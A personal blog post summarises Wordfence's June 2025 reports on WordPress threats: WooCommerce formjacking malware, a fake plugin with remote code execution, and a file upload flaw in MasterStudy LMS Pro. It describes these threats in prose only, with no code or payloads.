Critical vulnerabilities in WordPress plugins – June 2025
To ensure that your WordPress website is secure and stays that way, you need to have a security plugin.
One reason is that they report regularly on critical vulnerabilities of plugins you might use.
There are few available, although my preference goes to Wordfence.
Critical vulnerabilities in WordPress plugins – June 2025
The Wordfence Threat Intelligence team found sofar these vulnerabilities:
A sophisticated formjacking malware targeting WooCommerce sites.
The Wordfence Threat Intelligence team recently uncovered a sophisticated formjacking malware targeting WooCommerce sites. This malware injects a fake payment form into legitimate checkout processes and exfiltrates sensitive customer data to a remote Command & Control (C2) server.
Unlike traditional card skimmers that simply overlay existing forms, this variant carefully integrates with the WooCommerce site’s design and payment workflow, making it particularly difficult for site owners and users to detect.
Malware Masquerades as Legitimate, Hidden WordPress Plugin with Remote Code Execution Capabilities
The Wordfence Threat Intelligence team recently discovered an interesting malware variant that appears in the file system as a normal WordPress plugin containing a comment header, a handful of functions as well as a simple admin interface.
Just like previous examples we have seen, this piece of malware contains code that ensures it remains hidden in the administrator dashboard. It has a password extraction feature, which requires configuration through its own admin interface, an AJAX-based remote code execution mechanism and unfinished code suggesting it is still in development.
Arbitrary File Upload vulnerability in MasterStudy LMS Pro
On May 15th, 2025, we received a submission for an Arbitrary File Upload vulnerability in MasterStudy LMS Pro, a WordPress plugin with more than 15,000 estimated active installations. The MasterStudy Education WordPress theme from ThemeForest with more than 21,000 sales also includes the Pro plugin.
This vulnerability makes it possible for authenticated users such as subscribers to upload arbitrary files to a vulnerable site and achieve remote code execution in certain configurations, which is typically leveraged for a complete site takeover. Please note that this vulnerability only critically affects users who have enabled the “Media File Manager” and “Assignments” addons in the Pro plugin, both of which are disabled by default.
Annual WordPress security report for 2024.
In case you missed it, Wordfence just published its annual WordPress security report for 2024. Read it now to learn more about the evolving risk landscape of WordPress so you can keep your sites protected in 2025 and beyond.
All the best,
Luc
Thank you for your time. All you have to do now is click one of the buttons below to share with people you know or leave a comment, or subscribe to my newsletter (and enjoy my gift to you). I thank you if you do. 😉
About The Author
lucbizz
I’m Luc Dermul, a Belgian online entrepreneur living in “the big apple of Flanders” Antwerp